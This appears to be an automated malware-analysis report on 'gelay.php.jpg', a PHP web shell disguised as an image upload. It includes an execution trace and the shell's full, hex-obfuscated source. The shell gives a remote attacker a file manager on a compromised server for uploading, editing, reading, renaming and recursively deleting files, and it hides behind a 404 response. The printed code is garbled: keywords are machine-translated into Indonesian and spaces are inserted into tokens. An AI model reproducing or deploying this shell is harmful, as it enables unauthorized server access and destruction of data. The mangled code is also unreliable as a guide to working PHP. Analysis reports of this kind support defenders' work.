PHP Malware Analysis
gelay.php.jpg
md5: 38023475d26bdab4b7e6ce07ddd672c8
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
Environment
- error_reporting (Original)
Input
Title
Deobfuscated PHP code
Failed to deobfuscate codeExecution traces
data/traces/38023475d26bdab4b7e6ce07ddd672c8_trace-1676246208.5715.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:57:14.469298]
1 0 1 0.000165 393528
1 3 0 0.000257 411256 {main} 1 /var/www/html/uploads/gelay.php.jpg 0 0
1 3 1 0.000285 411600
1 4 0 0.000294 411632 Error->__toString 0 Unknown 0 0
2 5 0 0.000307 411712 Error->getTraceAsString 0 Unknown 0 0
2 5 1 0.000320 411968
2 5 R '#0 {main}'
1 4 1 0.000337 412264
1 4 R 'Error: Call to undefined function hex() in /var/www/html/uploads/gelay.php.jpg:95\nStack trace:\n#0 {main}'
0.000401 333784
TRACE END [2023-02-12 21:57:14.469569]
Generated HTML code
<html lang="en"><head></head><body style="background-color: # 000; color: #fff; font-family: serif;">swal ({title: \" {$ status} \ ", text: \" {$ msg} \ ", icon: \" {$ status} \ "}). lalu ((btnClick) => {if (btnClick) {document.location.href = \ "? p =". hex ($ p). $ loc. "\"}}) ";
}
function deldir ($ d) {
global $ func;
if (trim (pathinfo ($ d, PATHINFO_BASENAME), '.') === '') return;
jika ($ func [6] ($ d)) {
array_map ("deldir", glob ($ d. DIRECTORY_SEPARATOR. '{,.} *', GLOB_BRACE | GLOB_NOSORT));
rmdir ($ d);
} lain {
batalkan tautan ($ d);
}
}
?>
<!-- doctype html-->
<!-- - RandsX aka T1kus_g0t --->
<meta name="theme-color" content="red">
<meta name="viewport" content="width = device-width, initial-scale = 0,60, shrink-to-fit = no">
<link rel="stylesheet" href="// cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
<link rel="stylesheet" href="// cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title> <? = self?> </title>
<style> .table-hover tbody tr: hover td {background: red} .table-hover tbody tr: hover td> * {color: #fff} .table> tbody> tr> * {color: #fff; vertical- align: middle} .form-control {background: 0 0! important; color: #fff! important; border-radius: 0} .form-control :: placeholder {color: #fff; opacity: 1} li {font- size: 18px; margin-left: 6px; list-style: none} a {color: #fff} </style>
<script src="// unpkg.com/sweetalert/dist/sweetalert.min.js"> </script>
<div class="bg-dark table-responsive text-light border">
<div class="d-flex justify-content-between p-1">
<div> <h3 class="mt-2"> <a href="?"> <!--? = self?--> </a> </h3> </div>
<div>
<span> Versi PHP: <!--? = $ func [1] ()?--> </span> <br>
</div></div></div></body></html>Original PHP code
<? php
error_reporting (0);
http_response_code (404);
definisikan ("diri", "G \ x65l \ 64y M \ x69n \ x69 Sh \ x65ll");
$ scD = "s \ x63 \ x61 \ x6e \ x64 \ x69r";
$ Func = array ( "7068705f756e616d65", "70687076657273696f6e", "676.574.637.764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", " 636f7079" , "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64.617.465", "66696c656d74696d65");
untuk ($ i = 0; $ i <count ($ func); $ i ++) {
$ func [$ i] = nhx ($ func [$ i]);
}
if (isset ($ _ DAPATKAN ["p"])) {
$ p = nhx ($ _ DAPATKAN ["p"]);
$ func [3] (nhx ($ _ DAPATKAN ["p"]));
} lain {
$ p = $ func [2] ();
}
function hex ($ str) {
$ r = "";
untuk ($ i = 0; $ i <strlen ($ str); $ i ++) {
$ r. = dechex (ord ($ str [$ i]));
}
mengembalikan $ r;
}
function nhx ($ str) {
$ r = "";
$ len = (strlen ($ str) -1);
untuk ($ i = 0; $ i <$ len; $ i + = 2) {
$ r. = chr (hexdec ($ str [$ i]. $ str [$ i + 1]));
}
mengembalikan $ r;
}
perms fungsi ($ f) {
$ p = fileperms ($ f);
if (($ p & 0xC000) == 0xC000) {
$ i = 's';
} elseif (($ p & 0xA000) == 0xA000) {
$ i = 'l';
} elseif (($ p & 0x8000) == 0x8000) {
$ i = '-';
} elseif (($ p & 0x6000) == 0x6000) {
$ i = 'b';
} elseif (($ p & 0x4000) == 0x4000) {
$ i = 'd';
} elseif (($ p & 0x2000) == 0x2000) {
$ i = 'c';
} elseif (($ p & 0x1000) == 0x1000) {
$ i = 'p';
} lain {
$ i = 'u';
}
$ i. = (($ p & 0x0100)? 'r': '-');
$ i. = (($ p & 0x0080)? 'w': '-');
$ i. = (($ p & 0x0040)? (($ p & 0x0800)? 's': 'x'): (($ p & 0x0800)? 'S': '-'));
$ i. = (($ p & 0x0020)? 'r': '-');
$ i. = (($ p & 0x0010)? 'w': '-');
$ i. = (($ p & 0x0008)? (($ p & 0x0400)? 's': 'x'): (($ p & 0x0400)? 'S': '-'));
$ i. = (($ p & 0x0004)? 'r': '-');
$ i. = (($ p & 0x0002)? 'w': '-');
$ i. = (($ p & 0x0001)? (($ p & 0x0200)? 't': 'x'): (($ p & 0x0200)? 'T': '-'));
mengembalikan $ i;
}
fungsi a ($ msg, $ sts = 1, $ loc = "") {
global $ p;
$ status = (($ sts == 1)? "sukses": "kesalahan");
echo "<script> swal ({title: \" {$ status} \ ", text: \" {$ msg} \ ", icon: \" {$ status} \ "}). lalu ((btnClick) => {if (btnClick) {document.location.href = \ "? p =". hex ($ p). $ loc. "\"}}) </script> ";
}
function deldir ($ d) {
global $ func;
if (trim (pathinfo ($ d, PATHINFO_BASENAME), '.') === '') return;
jika ($ func [6] ($ d)) {
array_map ("deldir", glob ($ d. DIRECTORY_SEPARATOR. '{,.} *', GLOB_BRACE | GLOB_NOSORT));
rmdir ($ d);
} lain {
batalkan tautan ($ d);
}
}
?>
<! doctype html>
<! - RandsX aka T1kus_g0t ->
<html lang = "en">
<head>
<meta name = "theme-color" content = "red">
<meta name = "viewport" content = "width = device-width, initial-scale = 0,60, shrink-to-fit = no">
<link rel = "stylesheet" href = "// cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
<link rel = "stylesheet" href = "// cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title> <? = self?> </title>
<style> .table-hover tbody tr: hover td {background: red} .table-hover tbody tr: hover td> * {color: #fff} .table> tbody> tr> * {color: #fff; vertical- align: middle} .form-control {background: 0 0! important; color: #fff! important; border-radius: 0} .form-control :: placeholder {color: #fff; opacity: 1} li {font- size: 18px; margin-left: 6px; list-style: none} a {color: #fff} </style>
<script src = "// unpkg.com/sweetalert/dist/sweetalert.min.js"> </script>
</head>
<body style = "background-color: # 000; color: #fff; font-family: serif;">
<div class = "bg-dark table-responsive text-light border">
<div class = "d-flex justify-content-between p-1">
<div> <h3 class = "mt-2"> <a href="?"> <? = self?> </a> </h3> </div>
<div>
<span> Versi PHP: <? = $ func [1] ()?> </span> <br>
<a href="?p=<?= hex($p)."&a=".hex("newFile") ?> "> + File </a>
<a href="?p=<?= hex($p)."&a=".hex("newDir") ?> "> + Direktori </a>
</div>
</div>
<div class = "border-top table-responsive">
<li> Server: <? = "{$ _SERVER [" SERVER_NAME "]} ({$ _SERVER [" SERVER_ADDR "]} / {$ _ SERVER [" REMOTE_ADDR "]})"?> </li>
</div>
<form method = "post" enctype = "multipart / form-data"> <div class = "input-group mb-1 px-1 mt-1"> <div class = "custom-file"> <input type = "file" name = "f []" class = "custom-file-input" onchange = "this.form.submit ()" multiple> <label class = "custom-file-label rounded-0 bg-transparent text- light "> Pilih file </label> </div> </div> </form>
<? php
if (isset ($ _ FILES ["f"])) {
$ n = $ _FILES ["f"] ["nama"];
untuk ($ i = 0; $ i <count ($ n); $ i ++) {
if ($ func [11] ($ _ FILES ["f"] ["tmp_name"] [$ i], $ n [$ i])) {
a ("file berhasil diunggah");
} lain {
a ("file gagal diunggah", 0);
}
}
}
if (isset ($ _ GET ["download"])) {
header ("Jenis-Konten: application / octet-stream");
header ("Content-Transfer-Encoding: Binary");
header ("Panjang-Konten:". $ func [17] (nhx ($ _ DAPATKAN ["n"])));
header ("Isi-disposisi: lampiran; namafile = \" ". nhx ($ _ DAPATKAN [" n "])." \ "");
}
?>
</div>
<div class = "bg-dark border table-responsive-sm mt-2">
<div class = "ml-2" style = "font-size: 18px;">
<span> Jalur: </span>
<? php
$ ps = $ func [4] ("/ (\\\ | \ /) /", $ p);
foreach ($ ps sebagai $ k => $ v) {
jika ($ k == 0 && $ v == "") {
echo "<a href=\"?p=2f\"> ~ </a> /"; terus;
}
if ($ v == "") lanjutkan;
echo "<a href = \"? p = ";
untuk ($ i = 0; $ i <= $ k; $ i ++) {
echo hex ($ ps [$ i]);
jika ($ i! = $ k) echo "2f";
}
echo "\"> {$ v} </a> / ";
}
?>
</div>
</div>
<article class = "bg-dark border table-responsive-sm mt-2">
<? php if (! isset ($ _ GET ["a"])):?>
<table class = "table-hover table-bordered table-sm">
<thead class = "text-light">
<tr>
<th> Nama </th>
<th> Ukuran </th>
<th> Izin </th>
<th> Tindakan </th>
</tr>
</thead>
<tbody class = "text-light">
<? php
$ scD = $ func [5] ($ scD ($ p), [".", ".."]);
foreach ($ scD sebagai $ d) {
if (! $ func [6] ("$ p / $ d")) lanjutkan;
echo "
<tr>
<td> <a href = \ "? p =". hex ("$ p / $ d"). "\" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ " Modifikasi terbaru pada ". $ Func [19] (" Ymd H: i ", $ func [20] (" $ p / $ d "))." \ "> <I class = \" fa fa-fw fa- folder \ "> </i> {$ d} </a> </td>
<td> T / A </td>
<td> <font color = \ "". (($ func [8] ("$ p / $ d"))? "# 00ff00": (! $ func [9] ("$ p / $ d") ? "red": null)). "\"> ". perms (" $ p / $ d ")." </font> </td>
<td>
<a href = \ "? p =". hex ($ p). "& a =". hex ("rename"). "& n =". hex ($ d). "& t = d \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Ganti nama \"> <i class = \ "fa fa-fw fa-pencil \"> </i> </a>
<a href = \ "? p =". hex ($ p). "& a =". hex ("delete"). "& n =". hex ($ d). "\" class = \ "delete \" data-type = \ "folder \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Hapus \"> <i class = \ "fa fa-fw fa-trash \" > </i> </a>
</td>
</tr> ";
}
foreach ($ scD sebagai $ f) {
if (! $ func [7] ("$ p / $ f")) lanjutkan;
$ size = $ func [10] ("$ p / $ f") / 1024;
$ size = round ($ size, 3);
$ size = ($ size> 1024)? bulat ($ size / 1024, 2). "MB": $ size. "KB";
echo "
<tr>
<td> <a href = \ "? p =". hex ($ p). "& a =". hex ("view"). "& n =". hex ($ f). "\" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Modifikasi terbaru pada". $ func [19] ("Ymd H: i", $ func [20] ("$ p / $ f") ). "\"> <i class = \ "fa fa-fw fa-file \"> </i> {$ f} </a> </td>
<td> {$ size} </td>
<td> <font color = \ "". (($ func [8] ("$ p / $ f"))? "# 00ff00": (! $ func [9] ("$ p / $ f") ? "red": null)). "\"> ". perms (" $ p / $ f ")." </font> </td>
<td>
<div class = \ "d-flex justify-content-between \">
<a href = \ "? p =". hex ($ p). "& a =". hex ("edit"). "& n =". hex ($ f). "\" data-toggle = \ "tooltip \ "data-placement = \" auto \ "title = \" Edit \ "> <i class = \" fa fa-fw fa-edit \ "> </i> </a>
<a href = \ "? p =". hex ($ p). "& a =". hex ("rename"). "& n =". hex ($ f). "& t = f \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Ganti nama \"> <i class = \ "fa fa-fw fa-pencil \"> </i> </a>
<a href = \ "? p =". hex ($ p). "& n =". hex ($ f). "& download". "\" data-toggle = \ "tooltip \" data-placement = \ " auto \ "title = \" Unduh \ "> <i class = \" fa fa-fw fa-download \ "> </i> </a>
<a href = \ "? p =". hex ($ p). "& a =". hex ("delete"). "& n =". hex ($ f). "\" class = \ "delete \" data-type = \ "file \" data-toggle = \ "tooltip \" data-placement = \ "auto \" title = \ "Hapus \"> <i class = \ "fa fa-fw fa-trash \" > </i> </a>
</div>
</td>
</tr>
";
}
?>
</tbody>
</table>
<? php else: if (isset ($ _ DAPATKAN ["a"])) $ a = nhx ($ _ DAPATKAN ["a"]); ?>
<div class = "px-2 py-2">
<? php if ($ a == "hapus") {
$ loc = $ p. '/'. nhx ($ _ DAPATKAN ["n"]);
jika ($ _GET ["t"] == "d") {
deldir ($ loc);
if (! $ func [12] ($ loc)) {
a ("folder berhasil dihapus");
} lain {
a ("gagal menghapus folder", 0);
}
}
jika ($ _GET ["t"] == "f") {
$ loc = $ p. '/'. nhx ($ _ DAPATKAN ["n"]);
batalkan tautan ($ loc);
if (! $ func [12] ($ loc)) {
a ("file berhasil dihapus");
} lain {
a ("file untuk menghapus folder", 0);
}
}
}
?>
<? php if ($ a == "newDir"):?>
<h5 class = "border p-1 mb-3"> Folder baru </h5>
<form method = "post"> <div class = "form-group"> <label for = "n"> Nama: </label> <input name = "n" id = "n" class = "form-control "autocomplete =" off "> </div> <div class =" form-group "> <button type =" submit "name =" s "class =" btn btn-outline-light rounded-0 "> Buat </ tombol> </div> </form>
<? php ((isset ($ _ POST ["s"]))? ($ func [12] ("$ p / {$ _ POST [" n "]}")? a ("nama folder telah digunakan", 0, "& a =". Hex ("newDir")): ($ func [15] ("$ p / {$ _ POST [" n "]}")? A ("folder berhasil dibuat"): a (" folder gagal dibuat ", 0))): null); elseif ($ a == "file baru"):?>
<h5 class = "border p-1 mb-3"> File baru </h5>
<form method = "post"> <div class = "form-group"> <label for = "n"> Nama file: </label> <input type = "text" name = "n" id = "n" class = "form-control" placeholder = "hack.txt"> </div> <div class = "form-group"> <label for = "ctn"> Konten: </label> <textarea style = "resize: none "name =" ctn "id =" ctn "cols =" 30 "baris =" 10 "class =" form-control "placeholder =" # Stamped By Me "> </textarei> </div> <div class = "form-group"> <button type = "submit" name = "s" class = "btn btn-outline-light rounded-0"> Buat </button> </div> </form>
<? php ((isset ($ _ POST ["s"]))? ($ func [12] ("$ p / {$ _ POST [" n "]}")? a ("nama file telah digunakan", 0, "& a =". Hex ("newFile")): ($ func [13] ("$ p / {$ _ POST [" n "]}", $ _POST ["ctn"])? A ("file berhasil dibuat ", 1," & a = ". hex (" view ")." & n = ". hex ($ _ POST [" n "])): a (" file gagal dibuat ", 0))): null ); elseif ($ a == "ganti nama"):?>
<h5 class = "border p-1 mb-3"> Ganti nama <? = (($ _GET ["t"] == "d")? "folder": "file")?> </h5>
<form method = "post"> <div class = "form-group"> <label for = "n"> Nama: </label> <input type = "text" name = "n" id = "n" class = "form-control" value = "<? = nhx ($ _ GET [" n "])?>"> </div> <div class = "form-group"> <button type = "submit" name = " s "class =" btn btn-outline-light rounded-0 "> Simpan </button> </div> </form>
<? php ((isset ($ _ POST ["s"]))? ($ func [16] ($ p. '/'. nhx ($ _ DAPATKAN ["n"]), $ _POST ["n"]) ? a ("berhasil mengubah nama folder"): a ("gagal mengubah nama folder", 0)): null); elseif ($ a == "edit"):?>
<h5 class = "border p-1 mb-3"> Edit file </h5>
<span> Nama file: <? = nhx ($ _ GET ["n"])?> </span>
<form method = "post"> <div class = "form-group"> <label for = "ctn"> Konten: </label> <textarea name = "ctn" id = "ctn" cols = "30" baris = "10" class = "form-control"> <? = $ Func [18] ($ func [14] ($ p. '/'. Nhx ($ _ DAPATKAN ["n"])))?> </ textarea> </div> <div class = "form-group"> <button type = "submit" name = "s" class = "btn btn-outline-light rounded-0"> Simpan </button> </ div > </form>
<? php ((isset ($ _ POST ["s"]))? ($ func [13] ($ p. '/'. nhx ($ _ DAPATKAN ["n"]), $ _POST ["ctn"]) ? a ("konten file berhasil diubah", 1, "& a =". hex ("view"). "& n = {$ _ GET [" n "]}"): a ("konten file gagal diubah")) : null); elseif ($ a == "view"):?>
<h5 class = "border p-1 mb-3"> Lihat file </h5>
<span> Nama file: <? = nhx ($ _ GET ["n"])?> </span>
<div class = "form-group"> <label for = "ctn"> Konten: </label> <textarea name = "ctn" id = "ctn" cols = "30" row = "10" class = "form -control "readonly> <? = $ func [18] ($ func [14] ($ p. '/'. nhx ($ _ GET [" n "])))?> </textarei> </div>
<? php endif; ?>
</div>
<? php endif; ?>
</article>
<div class = "bg-dark border text-center mt-2">
<small> Hak Cipta & copy; 2021 - Didukung oleh Darknet Indonesia </small>
</div>
<script src = "// code.jquery.com/jquery-3.5.1.slim.min.js"> </script>
<script src = "// cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js"> </script>
<script src = "// cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"> </script>
<script> eval (fungsi (p, a, c, k, e, d) {e = function (c) {return (c <a? '': e (parseInt (c / a))) + ((c = c% a)> 35? String.fromCharCode (c + 29): c.toString (36))}; if (! ''. replace (/ ^ /, String)) {while (c -) {d [e (c)] = k [c] || e (c)} k = [fungsi (e) {kembalikan d [e]}]; e = fungsi () {return '\\ w +'}; c = 1}; sementara (c -) {if (k [c]) {p = p.replace (RegExp baru ('\\ b' + e (c) + '\\ b', 'g'), k [c])}} kembali p} ('En (); $ (\' [2-m = "4"] \ '). 4 (); $ (". l"). k (j (e) {mis. (); h 0 = $ (6) .5 ("2-0"); c ({b: "a", 9: "oiq?", w: "D" +0+ "p CB" , A: 7, z: 7,}). Y ((8) => {r (8) {x 1 = $ (6) .5 ("3") + "& t =" + ((0 == "v")? "d": "f"); us3 = 1}})}); ', 41,41,'ketik | buildURL | data | href | tooltip | attr | ini | benar | akanDelete | judul | peringatan | ikon | swal ||i>i> preventDefault | biarkan | Anda | fungsi | klik | hapus | toggle | init | Are | akan | yakin | jika | lokasi || dokumen | folder | teks | const | kemudian | hazardMode | tombol | dihapus | menjadi | Ini | bsCustomFileInput'.split ('|'), 0, {})) </script>
</ Body>
</html>